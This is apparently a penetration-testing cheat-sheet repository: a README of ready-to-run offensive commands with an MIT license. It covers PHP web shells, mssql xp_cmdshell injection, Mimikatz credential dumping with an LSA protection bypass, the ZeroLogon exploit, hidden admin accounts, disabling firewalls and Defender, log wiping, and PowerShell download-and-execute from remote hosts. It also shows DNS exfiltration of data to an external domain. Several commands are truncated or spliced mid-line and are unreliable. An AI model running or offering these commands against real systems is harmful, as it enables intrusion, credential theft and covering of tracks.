├── LICENSE
└── README.md

/LICENSE:
--------------------------------------------------------------------------------
MIT License

Copyright (c) 2023 safe6

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
--------------------------------------------------------------------------------

/README.md:
--------------------------------------------------------------------------------
# command
A collection of commands commonly used during penetration tests.

Recommended: search this page directly with Ctrl+F.


## Java command execution
Encoding sites:
https://ares-x.com/tools/runtime-exec/
https://r0yanx.com/tools/java_exec_encode/
https://www.bugku.net/runtime-exec-payloads/

Manual encoding
```
bash -c {echo,cGluZyAxMjcuMC4wLjE7ZWNobyAxID50ZXN0LnR4dA==}|{base64,-d}|{bash,-i}
```

On Windows
```
getRuntime().exec(\"cmd /c echo 1 > D://tomcat//webapps//ROOT//90s.txt\");
```


## Command execution: locate a resource file and write a file to get output back
Linux
```
find /|grep index.js|while read f;do sh -c "whoami" >$(dirname $f)/test.txt;done
```
Windows (mind the drive letter)
```
for /r D:\ %i in (index.js*) do whoami > %i/../test.txt
```

## Writing a shell
On Windows, the batch characters that need escaping are mainly "&", "|", "<", ">" and so on; the escape character is "^".
On Linux, the characters that need escaping are mainly single and double quotes; a single quote can simply be replaced with \47.
The maximum Windows command-line length is 8191 characters, and the hex length limit is 113898. Watch the length when writing files with echo.

Method 1
```
set /p=qaxnbd:\1d13.txt
```
Method 2
```
echo qaxnb>1we.txt
```
Append content
```
echo qaxnb>>1we.txt
```
Append without a newline
```
set /p="121d2">>a.txt
```
Avoiding spaces
```
echo.123>>a.txt
echo,123>>a.txt
type;a.txt
```
Writing a file with PowerShell
```
powershell -c "'a' | Out-File C:\1.txt -Append -NoNewline"
```

For files containing many special characters, encode them with certutil and decode on the target.
```
hex
certutil -encodehex 111.jsp 111.txt

base64
certutil -encode 111.jsp 111.txt

quick hex conversion on the macOS command line
xxd -ps -u Everything.exe | tr -d '\n' >ou.txt
```

Decode as follows
```
certutil -f -decode 111.txt C:\\111.jsp
certutil -decodehex 111.txt C:\\111.jsp

check a hash
certutil -hashfile a.exe MD5
```
base64 on Linux
```
echo PD9waHAgZXZhbCgkX1BPU1Rbd2hvYW1pXSk7Pz4=|base64 -d > /var/www/html/shell.php
```
PHP
```
echo \<\?php eval\(\@\$_POST\[1\]\)\; \?\> >1.php
```
Bypassing spaces
```
> < <> redirection operators
%09 (requires a PHP environment)
${IFS}
$IFS$9
{cat,flag.php}
%20
%09
```

## Packaging a directory on Windows

```
powershell -Command "Compress-Archive -Path E:\update\ -DestinationPath E:\test.zip"
```

## Anonymous file storage
Usable from the command line
https://transfer.sh/
Very simple to use
```
upload; on success a random path is returned
curl --upload-file ./hello.txt https://transfer.sh/hello.txt

fetch
https://transfer.sh/fF6OA7aF8o/hello.txt

```


## nbtscan

```
nbtscan.exe 10.11.1.0/24
```

## Live host discovery with DOS commands
```
for /L %I in (1,1,256) DO @ping -w 1 -l 1 192.168.202.%I | findstr "TTL="
```


## nmap

Ping scan only; no port scanning or service/version detection
```
nmap -sn 10.11.1.0/24
```

SYN scan without ping
```
sudo nmap -sS -Pn 192.168.10.1/24
```

Host discovery with UDP probes; fairly slow
```
sudo nmap -sU -Pn 10.11.1.0/24
```
Host discovery using several methods (TCP ACK, TCP FIN and UDP packets)
```
sudo nmap -PA -Pn 192.168.10.1/24
```

Version scan, all ports
```
nmap -sV -p- 10.11.1.0
```

```
nmap 10.11.1.0 --script vuln
```

```
nmap -p445 10.11.1.0 --script smb-vuln-ms17-010
```

```
nmap -v -sn -PE -n --min-hostgroup 1024 --min-parallelism 1024 -oG tmp -iL ip.txt | awk '{print $5}' | grep -v "latency)." >ok_ip.txt
```

nmap fast scan, lightning quick
```
nmap -n --unique --resolve-all -Pn --min-hostgroup 64 --max-retries 0 --host-timeout 10m --script-timeout 3m -oX (unknown) --version-intensity 9 --min-rate 10000 -T4 192.168.23.1
nmap -n --resolve-all -Pn --min-hostgroup 64 --max-retries 0 --host-timeout 10m --script-timeout 3m -oX (unknown) --version-intensity 9 --min-rate 10000 -T4 192.168.23.1
```

Get HTTP titles
```
nmap -n --resolve-all -Pn --min-hostgroup --max-retries 3 --host-timeout 10m --script-timeout 3m --version-intensity 9 --min-rate 10000 --script=http-title -T4 -p- -iL domain.txt
```

## masscan
Mind the rate and adjust it to your bandwidth. On 100M bandwidth you can go up to 3000; that is for a VPS, not home broadband.

To build, just git clone and run make. The binary is produced under bin.
Scan a single IP
```
masscan 192.168.1.110 -p 1-65535 --rate=1000
```
Scan a list
```
masscan -iL ip.txt -p1-65535 --rate=1000 -oL port.txt
```

Parse the output and extract ip:port
```
cat port.txt |awk '{print $4":"$3}'
```
Convert to a port list nmap can use
```
cat p.txt | tr "\n" ,
```




## Port lists

```
22,23,135,445,389,3389,80,443,8080,7001,3306,1433,1521,6379,27017,2375,5900,5432,4899

21-23,80-90,135,137,161,389,443,445,873,1099,1433,1521,1900,2082,2083,2222,2375,2376,2601,2604,3128,3306,3311,3312,3389,4440,4848,5001,5432,5560,5900-5902,6082,6379,7001-7010,7778,8009,8080-8090,8649,8888,9000,9200,10000,11211,27017,28017,50000,51111,50030,50060

```

## Wordlists

top200

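Going back to the masscan section above: this added example (not part of the original cheat sheet) does in Python what the `awk '{print $4":"$3}'` and `tr "\n" ,` one-liners do with `-oL` output, and additionally groups ports per host so each host gets its own `nmap -p` argument. The `-oL` sample is constructed, not a real scan.

```python
"""Parse masscan -oL output into ip:port pairs and per-host nmap -p port lists."""
from collections import defaultdict

# Constructed sample in masscan's -oL format: "state proto port ip timestamp [...]".
# It contains a duplicate line and a banner line to show that both are handled.
SAMPLE_OL = """#masscan
open tcp 80 192.168.1.110 1700000000
open tcp 443 192.168.1.110 1700000001
open tcp 22 192.168.1.12 1700000002
open tcp 80 192.168.1.110 1700000003
banner tcp 80 192.168.1.110 1700000004 http.server Apache
# end
"""


def ip_key(ip):
    """Sort IPv4 addresses numerically instead of lexically; non-IPv4 go last."""
    try:
        return tuple(int(octet) for octet in ip.split("."))
    except ValueError:
        return (256, ip)


def parse_masscan_list(text):
    """Return sorted, de-duplicated (ip, port) tuples for the 'open' records.
    Comment lines start with '#'; banner records and malformed lines are skipped."""
    pairs = set()
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        if len(fields) < 5 or fields[0] != "open":
            continue
        try:
            port = int(fields[2])
        except ValueError:
            continue
        if not 0 < port < 65536:
            continue
        pairs.add((fields[3], port))
    return sorted(pairs, key=lambda p: (ip_key(p[0]), p[1]))


def ip_port_lines(text):
    """The 'ip:port' form produced by:  awk '{print $4":"$3}'"""
    return [f"{ip}:{port}" for ip, port in parse_masscan_list(text)]


def compress_ports(ports):
    """[22, 80, 81, 82, 443] -> '22,80-82,443' (nmap accepts ranges in -p)."""
    ports = sorted(set(ports))
    out, start, prev = [], ports[0], ports[0]
    for p in ports[1:]:
        if p == prev + 1:
            prev = p
            continue
        out.append(f"{start}-{prev}" if start != prev else str(start))
        start = prev = p
    out.append(f"{start}-{prev}" if start != prev else str(start))
    return ",".join(out)


def nmap_port_args(text):
    """Per-host comma-joined port list, usable as:  nmap -p <ports> <ip>
    (the page's  cat p.txt | tr "\\n" ,  but split per host and range-compressed)."""
    by_host = defaultdict(list)
    for ip, port in parse_masscan_list(text):
        by_host[ip].append(port)
    return {ip: compress_ports(ports) for ip, ports in by_host.items()}


if __name__ == "__main__":
    for entry in ip_port_lines(SAMPLE_OL):
        print(entry)
    for ip, ports in nmap_port_args(SAMPLE_OL).items():
        print(f"nmap -sV -p {ports} {ip}")
```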


## Mimikatz

One-liner
```
.\mimikatz "privilege::debug" "sekurlsa::logonpasswords" exit
```
Running several commands in the console; use log so that nothing is lost if the process crashes
```
mimikatz # privilege::debug
mimikatz # log
mimikatz # sekurlsa::logonpasswords
mimikatz # sekurlsa::wdigest
```
Running the commands from msf
```
mimikatz_command -f sekurlsa::logonPasswords full
mimikatz_command -f sekurlsa::wdigest
```
Enable WDigest through the registry; it is off by default from 2008 R2 onwards. The target user must log off and log on again; 2016 needs a reboot.
```
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /f /d 1
```
### Bypassing LSA Protection (PPL)
Check whether it is enabled
```
reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa

```
Copy mimidriver.sys into the same directory and load it for the bypass
```
mimikatz # !+
mimikatz # !processprotect /process:lsass.exe /remove
mimikatz # privilege::debug
mimikatz # token::elevate
mimikatz # sekurlsa::logonpasswords
mimikatz # !processprotect /process:lsass.exe
mimikatz # !-
```





## Parsing CS credentials

Extract the usernames
```
awk -F":::" '{print $1}' credentials.txt | awk -F"\\" '{print $2}'
```
Extract the hashes
```
awk -F":::" '{print $2}' credentials.txt
```





## Ping scan for live hosts
```
for /L %I in (1,1,256) DO @ping -w 1 -l 1 192.168.202.%I | findstr "TTL="
```



## gobuster

```
gobuster dir -u https://buffered.io -w ~/wordlists/shortlist.txt
```

## dirsearch

```
python3 dirsearch.py -e php,html,js -u https://target
```

```
python3 dirsearch.py -e php,html,js -u https://target -w /path/to/wordlist
```

Scan directories
```
python3 dirsearch.py -e php,html,js -u https://target -w /path/to/wordlist --remove-extensions
```

```
python3 dirsearch.py -e php,htm,js,bak,zip,tgz,txt -u https://target -t 20
```

```
python3 dirsearch.py -e php,html,js -u https://target --proxy 127.0.0.1:8080
```

```
python3 dirsearch.py -e php,html,js -u https://target --proxy socks5://10.10.0.1:8080
```

Batch scan from a file
```
python3 dirsearch.py -l all_site.txt -o result.txt
```

## Proxy tools
proxychain
sockscap64
proxifier
ccproxy
sockscap

https://drive.google.com/drive/folders/1x5naJeK2YkV6QCYUlUg5QNMl1Izf4-ti
https://www.mediafire.com/folder/32rj1769a2w82/v4.7


## Intranet tunnelling tools

### fuso

- https://github.com/editso/fuso.git
- Relatively obscure, so it is not flagged by AV

Start a socks5 proxy on 9004
```
fuc.exe 159.138.0.0 9003 -h 127.0.0.1 -p 9004 -b 9004 -n test -t socks5 --bridge-host 0.0.0.0 --bridge-port 9004
```

### frp

### nps
https://github.com/ehang-io/nps

```
sudo ./nps install
sudo nps start
```
After installation the configuration lives in /etc/nps; the default credentials (changeable in the config file) are admin/123

### iox

### Stowaway
https://github.com/lz520520/Stowaway

### Venom
https://github.com/Dliv3/Venom



## ssh
Shell that leaves no history

```
ssh -T root@192.168.1.1 /usr/bin/bash -i
```

## grep searches

```
grep -E "([0-9]{1,3}[\.]){3}[0-9]{1,3}" -r xxx --color=auto
```

```
grep -E "https?://[a-zA-Z0-9\.\/_&=@$%?~#-]*" -r xxx --color=auto
```

```
grep -EHirn "accesskey|admin|aes|api_key|apikey|checkClientTrusted|crypt|http:|https:|password|pinning|secret|SHA256|SharedPreferences|superuser|token|X509TrustManager|insert into" APKfolder/
```

```
grep -ohr -E "https?://[a-zA-Z0-9\.\/_&=@$%?~#-]*" /app/ |sort|uniq >> test.txt
```

Web applications
```
grep -EHirn '--include=*.'{java,jsp,jspx,xml,conf,json,ini,properties,yaml,toml,plist,txt,sql} "accesskey|api_key|apikey|jdbc|username|pass|passwd|password" webapps/
```

Search for a string inside files
```
grep -r "test" ./src

show line numbers
grep -rn "test" ./src
```


## mysql

Enable remote access

```
use mysql;
update user set host = '%' where user = 'root';
FLUSH PRIVILEGES ;
select host, user from user;
mysql -uroot -p -e "select * from mysql.user;" >1.txt
```

Run SQL directly without an interactive login
```
mysql -uaHmin -proot test -e "select now()" -N >H:/work/target1.txt
mysql -uroot -e "show databases;" >1.txt
```

mysql getshell

```
show variables like '%secure%'
select '' into outfile '/var/www/xx.php';
select '' into dumpfile '/var/www/xx.php';
```

```
set global general_log=on;
set global general_log_file='/var/www/1.php';
select '';
```

```
select '' into outfile 'C:/wamp/www/abb.php';

```

## sqlmap

```
python sqlmap.py -u "http://www.vuln.cn/post.php?id=1" --proxy "http://127.0.0.1:1080"
```

```
python sqlmap.py -u "http://www.vuln.cn" --cookie "id=11" --level 2
```

```
python sqlmap.py -u "www.xxxx.com/product/detail/id/3*.html" --dbms=mysql -v 3
```

```
python sqlmap.py -u "http://www.vuln.cn/post.php?id=1" --dbms mysql --dbs
```

```
python sqlmap.py -u "http://www.vuln.cn/post.php?id=*" --dbms mysql --dbs
```

```
python sqlmap.py -u "http://www.vuln.cn/post.php?id=1" --dbms mysql -D test --tables
```

```
python sqlmap.py -u "http://www.vuln.cn/post.php?id=1" --dbms mysql -D test -T admin --columns
```

```
python sqlmap.py -u "http://www.vuln.cn/post.php?id=1" --dbms mysql -D test -T admin -C "username,password" --dump
```

```
python sqlmap.py -r "c:\request.txt" -p id --dbms mysql --file-read="e:\www\as\config.php"
```

Debugging a custom tamper
```
python sqlmap.py -u "http://www.vuln.cn/post.php?id=1&pwd=11;*&page=1&clientip=1" --dbms mssql --proxy "http://192.168.2.144:8443" --tamper=custom_key_tamper -v 3 --batch --random-agent
```

## SQL injection

### mssql
Stacked injection, xp_cmdshell
```
http://www.vuln.cn/post.php?id=11;DECLARE/**/@ljbd/**/VARCHAR(8000);SET/**/@ljbd=0x70696e67202d6e6320312077772e36373332396163312e646e732e313433332e65752e6f7267;EXEC/**/master..xp_cmdshell/**/@ljbd--
```

Writing a CLR assembly: convert the DLL to hex beforehand and write it in batches
```
>>"c:\windows\tasks\clrdatabase.dll.tmp" set /p="000000001b300b00300000""D:\\web\\Admin\\script\\sa.aspx" set /p="0x3c25402050616765204c616e67756167653d22432322253e0d0a3c254020496d706f7274204e616d6573706163653d225379737"$(dirname $file)/finddir.txt;done
```
Delete
```
find /root -name war|while read file;do sh -c "rm $(dirname $file)/finddir.txt";done
```

#### Inside the war directories under /root
Write
```
find /root -name war|while read file;do sh -c "echo $file">$file/finddir.txt;done
```
Delete
```
find /root -name war|while read file;do sh -c "rm $file/finddir.txt";done
```

### windows
```
for /d %i in (D:\web\*) do whoami > "%i\test.txt"
```

#### Next to a war.txt file in any subdirectory of C:\Users\liulangmao\Desktop
Write
```
for /f %i in ('dir /s /b C:\Users\liulangmao\Desktop\war.txt') do (echo %i > %i\..\finddir.txt)
```
Delete
```
for /f %i in ('dir /s /b C:\Users\liulangmao\Desktop\war.txt') do (del %i\..\finddir.txt)
```

#### Inside a war folder in any subdirectory of C:\Users\liulangmao\Desktop
Write
```
for /f %i in ('dir /s /b C:\Users\liulangmao\Desktop\war') do (echo %i > %i\finddir.txt)
```
Delete
```
for /f %i in ('dir /s /b C:\Users\liulangmao\Desktop\war') do (del %i\finddir.txt)
```
Example: on a WebLogic target, write the path of every war directory under /root into a finddir.txt inside that directory.
```
find /root -name war|while read file;do sh -c "echo $file">$file/finddir.txt;done

```
Find the executable path from a process name
```
wmic process where name='mysqld.exe' get processid,executablepath,name
```
Find the path from a PID
```
wmic process get name,executablepath,processid|findstr pid
```

Find login.jsp from the executable path
```
for /f %i in ('dir /s /b D:\UFGOV\U8\login.jsp') do (echo %i)
```

Append base64 in segments without newlines
```
echo|set /p=\"PCFET0NUWVBFIGh0bWw+IDxodG1sPiA8aGVhZD4gPG1ldGEgaHR0cC1lcXVpdj0iQ29udGVudC1UeXBlIiBjb250ZW50PSJ0ZXh0L2h0bWw7IGNoYXJzZXQ9dXRmLTgiIC8+PGgxPjIwMjHlubR4eHjnvZHnu5zlronlhajlrp7miJjmvJTnu4M8L2gxPg==\" > D:\UFGOV\U8\webapps\demonstrate.txt
```

Working around cmd producing no output
```
powershell Get-ChildItem C:
```


## hydra

```
options:
-l a single username   -L username list
-p a single password   -P password list
-s port
-o output file
-t number of tasks, default 16
-f stop after the first successful login
-v verbose error log   -V show every attempt
>hydra -L /root/user.txt -P pass.txt 10.1.1.10 mysql
>hydra -L /root/user.txt -P pass.txt 10.1.1.10 ssh -s 22 -t 4
>hydra -L /root/user.txt -P pass.txt 10.1.1.10 mssql -vv
>hydra -L /root/user.txt -P pass.txt 10.1.1.10 rdp -V
>hydra -L /root/user.txt -P pass.txt 10.1.1.10 smb -vV
>hydra -L /root/user.txt -P pass.txt ftp://10.1.1.10
```

## medusa

```
options:
-h target host or IP   -H target list
-u username   -U username list
-p password   -P password list   -f stop after the first success   -M service   -t threads
-n port   -e ns also try an empty password and a password equal to the username
>medusa -h ip -u sa -P /pass.txt -t 5 -f -M mssql
>medusa -h ip -U /root/user.txt -P /pass.txt -t 5 -f -M mssql
```

## Python interactive shell

py3

```
python3 -c "import pty;pty.spawn('/bin/bash')"
```

py2
```
python2 -c 'import pty;pty.spawn("/bin/sh")'

python -c 'import pty;pty.spawn("/bin/bash")'

```
Remember to clear the history when done
```
history -c
```


## Adding a user non-interactively

```
useradd newuser;echo "newuser:password"|chpasswd
```

```
useradd -p `openssl passwd 123456` guest
```

```
useradd -p "$(openssl passwd 123456)" guest
```

```
useradd newuser;echo -e "123456\n123456\n" |passwd newuser
```

### Adding a user on Windows
```
net user admin$ Afabab@20 /add
net localgroup administrators admin$ /add

net user guest /active:yes
net localgroup administrators guest /add

Net localgroup Administrators kent /add /domain     add a domain user to the domain Administrators group

Net localgroup Administrators /add test\kent        add a domain user to the local Administrators group
```

## Firewall operations
```
disable the firewall

netsh firewall set opmode mode=disable

allow inbound traffic coming from remote port 8888
netsh advfirewall firewall add rule name="88" protocol=TCP dir=in remoteport=8888 action=allow

allow outbound traffic going to remote port 8888
netsh advfirewall firewall add rule name="88" protocol=TCP dir=out remoteport=8888 action=allow

allow outbound traffic from local port 4444
netsh advfirewall firewall add rule name="44" protocol=TCP dir=out localport=4444 action=allow

allow inbound traffic to local port 4444
netsh advfirewall firewall add rule name="44" protocol=TCP dir=in localport=4444 action=allow

delete a rule
netsh advfirewall firewall delete rule name="88"

show the firewall configuration (including the individual rules)
netsh firewall show config

stop Windows Defender
net stop windefend

netsh firewall set portopening TCP 445 ENABLE //open port 445
netsh firewall set portopening TCP 3389 ENABLE //open the terminal services port
netsh firewall delete allowedprogram C:/A.exe //remove the allowed program A.exe
netsh firewall set allowedprogram C:/A.exe test ENABLE //add A.exe on the C: drive and allow it
netsh firewall add allowedprogram C:/A.exe test ENABLE //add A.exe on the C: drive and allow it

newer syntax

netsh advfirewall firewall add rule name="test" dir=in action=allow program="C:\windows\temp\update.exe" enable=yes
netsh advfirewall firewall add rule name="test" dir=out action=allow program="C:\windows\temp\update.exe" enable=yes

```
Port forwarding
Forward local port 801 to port 80 on the remote host 172.23.80.14
```
netsh interface portproxy add v4tov4 listenport=801 connectport=80 connectaddress=172.23.80.14
```

iptables allow rule
```
iptables -A INPUT -p tcp --dport 80 -j ACCEPT

```

## Common frp configuration
frpc.ini
```
[common]
server_addr = xxxxxx
server_port = 7000

[rdp]
type = tcp
local_port = 3389
remote_port = 3389

[plugin_http_proxy]
type = tcp
remote_port = 10801
plugin = http_proxy

[plugin_socks5]
type = tcp
remote_port = 1080
plugin = socks5

```

## ZeroLogon

- Generates event log entries: 4742 (successful exploitation), 5580 (failed exploitation)
- Obvious traffic signature
- Killed instantly by AV
- May cause the target to drop out of the domain
- Unstable through a proxy; prone to problems



```
git clone https://github.com/mstxq17/cve-2020-1472.git

python3 zerologon_tester.py Dc02 172.23.119.120     check from outside the domain

PingCastle.exe --server 172.23.119.120 --scanner zerologon --scmode-dc     check from inside the domain

```

Use the vulnerability to blank the target DC's machine account password
```
python3 cve-2020-1472-exploit.py Dc02$ 172.23.119.120

```
Extract ntds.dit remotely without a password
```
python3 secretsdump.py qq.local/'Dc02$'@172.23.119.120 -no-pass -outputfile qq.local.ntds.hash
```

Use the administrator domain-admin hash to dump the DC machine account hash remotely [hex format]
```
python3 secretsdump.py -hashes :ccef208c6485269c20db2cad21734fe7 qq/administrator@172.23.119.120
```
Restore the DC machine account password from the hex obtained above
```
python3 restorepassword.py Dc02@Dc02 -target-ip 172.23.119.120 -hexpass daf1d2acc25d2e54218921737a40d58192b9bcdf089ddbeaf9f7931571b07916f96e2c51d8d00f56d2440c13c0e5586e2dafd1669e37131***

```



## Deleting RDP logs

Clear the remote desktop connection history; create clear.bat

```
@echo off
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"
cd %userprofile%\documents\
attrib Default.rdp -s -h
del Default.rdp
```

## Deleting web logs
```
/var/log/nginx/

access.log
error.log

tomcat: under logs
catalina.*.log
access_log.*.txt

```

Linux system logs
```
#!/usr/bin/bash
echo > /var/log/syslog
echo > /var/log/messages
echo > /var/log/httpd/access_log
echo > /var/log/httpd/error_log
echo > /var/log/xferlog
echo > /var/log/secure
echo > /var/log/auth.log
echo > /var/log/user.log
echo > /var/log/wtmp
echo > /var/log/lastlog
echo > /var/log/btmp
echo > /var/run/utmp
rm ~/.bash_history
history -c
```
Windows IIS logs
```
C:\inetpub\logs\LogFiles
```


## Enabling 3389
```
Method 1
wmic /namespace:\root\cimv2\terminalservices path win32_terminalservicesetting where (__CLASS != "") call setallowtsconnections 1
wmic /namespace:\root\cimv2\terminalservices path win32_tsgeneralsetting where (TerminalName ='RDP-Tcp') call setuserauthenticationrequired 1
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f
net start TermService

Method 2
#set the remote desktop port
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /t REG_DWORD /v portnumber /d 3389 /f
#enable remote desktop
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
#check the port status
netstat -an|find "3389"
#disable remote desktop
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 0
```

## File search
https://www.anquanke.com/post/id/245019

```
findstr /s /i /n /d:C:\ /c:"123123" *.txt
```

```
for /r C: %i in (login.*) do @echo %i
```

```
where /R C: login.*
```

```
dir /s/a-d/b login.*
```

```
find / -name index.php
```

```
find / -name "index.php" | xargs grep "111222"
```

```
updatedb && locate index.php
```


```
process paths
wmic process get name,executablepath
```
## Out-of-band (OOB) exfiltration when command execution gives no output
#### Windows
On Windows, %cd% is the current directory. We write it to the text file temp with echo, base64-encode the file with certutil, filter out the lines certutil adds, assign the result to a variable, and finally send it out with nslookup, which gives us the current directory.
```
echo %cd% > temp&&certutil -encode temp temp1&&findstr /L /V "CERTIFICATE" temp1 > temp2&&set /p ADDR=>text3.txt)
```
The reason the = has to be filtered out above is that ping does not accept = in its argument. Compared with nslookup, ping has a higher success rate, but a path that is too long may make it fail; how long is too long needs to be tested.
```
echo %cd% > temp&&certutil -encode temp temp1&&findstr /L /V "CERTIFICATE" temp1 > temp2&&for /f "delims=^= tokens=1,*" %i in (temp2) do (echo %i>>temp3)&&set /p ADDR= test && certutil -encodehex -f test test.hex 4 && powershell $text=Get-Content test.hex;$sub=$text -replace(' ','');$j=11111;foreach($i in $sub){ $fin=$j.tostring()+'.'+$i+'.is1lv6.ceye.io';$j += 1; nslookup $fin }
```
Common Windows variables

| Variable | Type | Description |
|---|---|---|
| %ALLUSERSPROFILE% | Local | Returns the location of the "All Users" profile. |
| %APPDATA% | Local | Returns the location where applications store data by default. |
| %CD% | Local | Returns the current directory string. |
| %CMDCMDLINE% | Local | Returns the exact command line used to start the current Cmd.exe. |
| %CMDEXTVERSION% | System | Returns the version number of the current Command Processor Extensions. |
| %COMPUTERNAME% | System | Returns the name of the computer. |
| %COMSPEC% | System | Returns the exact path to the command shell executable. |
| %DATE% | System | Returns the current date, in the same format as the date /t command. Generated by Cmd.exe. See Date for details on the date command. |
| %ERRORLEVEL% | System | Returns the error code of the most recent command. A non-zero value usually indicates an error. |
| %HOMEDRIVE% | System | Returns the local workstation drive letter connected to the user's home directory. Set based on the home directory value, which is specified in Local Users and Groups. |
| %HOMEPATH% | System | Returns the full path of the user's home directory. Set based on the home directory value, which is specified in Local Users and Groups. |
| %HOMESHARE% | System | Returns the network path to the user's shared home directory. Set based on the home directory value, which is specified in Local Users and Groups. |
| %LOGONSERVER% | Local | Returns the name of the domain controller that validated the current logon session. |
| %NUMBER_OF_PROCESSORS% | System | Specifies the number of processors installed on the computer. |
| %OS% | System | Returns the operating system name. Windows 2000 reports its operating system as Windows_NT. |
| %PATH% | System | Specifies the search path for executable files. |
| %PATHEXT% | System | Returns the list of file extensions the operating system considers executable. |
| %PROCESSOR_ARCHITECTURE% | System | Returns the processor's chip architecture. Values: x86 or IA64 (Itanium-based). |
| %PROCESSOR_IDENTIFIER% | System | Returns a description of the processor. |
| %PROCESSOR_LEVEL% | System | Returns the model number of the processor installed on the computer. |
| %PROCESSOR_REVISION% | System | Returns the revision number of the processor. |
| %PROMPT% | Local | Returns the command prompt settings of the current interpreter. Generated by Cmd.exe. |
| %RANDOM% | System | Returns a random decimal number between 0 and 32767. Generated by Cmd.exe. |
| %SYSTEMDRIVE% | System | Returns the drive containing the Windows server operating system root directory (the system root). |
| %SYSTEMROOT% | System | Returns the location of the Windows server operating system root directory. |
| %TEMP% and %TMP% | System and User | Returns the default temporary directory used by applications available to the currently logged-on user. Some applications require TEMP, others TMP. |
| %TIME% | System | Returns the current time, in the same format as the time /t command. Generated by Cmd.exe. See Time for details on the time command. |
| %USERDOMAIN% | Local | Returns the name of the domain that contains the user's account. |
| %USERNAME% | Local | Returns the name of the currently logged-on user. |
| %USERPROFILE% | Local | Returns the location of the current user's profile. |
| %WINDIR% | System | Returns the location of the operating system directory. |

#### Linux
On Linux, pwd also shows the current directory. We strip the newline with tr -d and convert the value to hex with xxd -ps, and can then send out whatever we want.
```
ping pwd|tr -d '\n'|xxd -ps.is1lv6.ceye.io
```
The base64 variant works the same way: base64-encode the value and strip the "=" to send the data out successfully.
```
pingpwd|base64|tr -d ‘=’.is1lv6.ceye.io
```
If several lines of data need to be sent out, consider the statement below.
```
var=11111 && for b in $(find / -name "index.php" | xargs grep "111222"|xxd -p); do var=$((var+1)) && dig $var.$b.is1lv6.ceye.io; done
```

## Windows short file names
Viewing short names
```
the "dir /x" command shows the system's abbreviation of a directory or file name
```
Common short names
```

Documents and Settings
can be written as
DOCUME~1
Another example:
Local Settings
can be written as
LOCALS~1

Program Files
Program Files (x86)
these two directories are written as:
PROGRA~1
PROGRA~2
```

## Fileless execution
Running PowerShell without writing a file to disk
```
powershell -c "Invoke-Expression (New-Object Net.WebClient).DownloadString("http://xxx.xx.xx.xx/test.ps1")"

powershell -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://baidu.com/test.ps1'))"

powershell -ExecutionPolicy Bypass -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://baidu.com/test.ps1'))"

echo IEX(New-Object Net.WebClient).DownloadString("http://10.10.14.13:8000/rev.ps1") | powershell -noprofile
```

## Defender exclusions
```
powershell -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath "C:\test"
```


## PowerShell file download

```
powershell (new-object System.Net.WebClient).DownloadFile('http://192.168.1.1/1.exe','C:\test\1.exe');start-process 'C:\test\1.exe'
```
Common form
```
powershell (new-object System.Net.WebClient).DownloadFile('http://192.168.1.1/1.exe','1.exe')
```

Bypass download

```
echo (new-object System.Net.WebClient).DownloadFile('http://192.168.31.93:8000/tomcat.exe','C:/Users/test/cc.exe')| powershell -
```

## Running scripts with PowerShell
base64 encoding (unlike ordinary base64, it does not decode with the usual tools)
```
$Text = "(new-object System.Net.WebClient).DownloadFile('http://xxxxxxxxxx:8000/bddch.txt','bdchd.txt')"
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)
$EncodedText =[Convert]::ToBase64String($Bytes)
$EncodedText
```
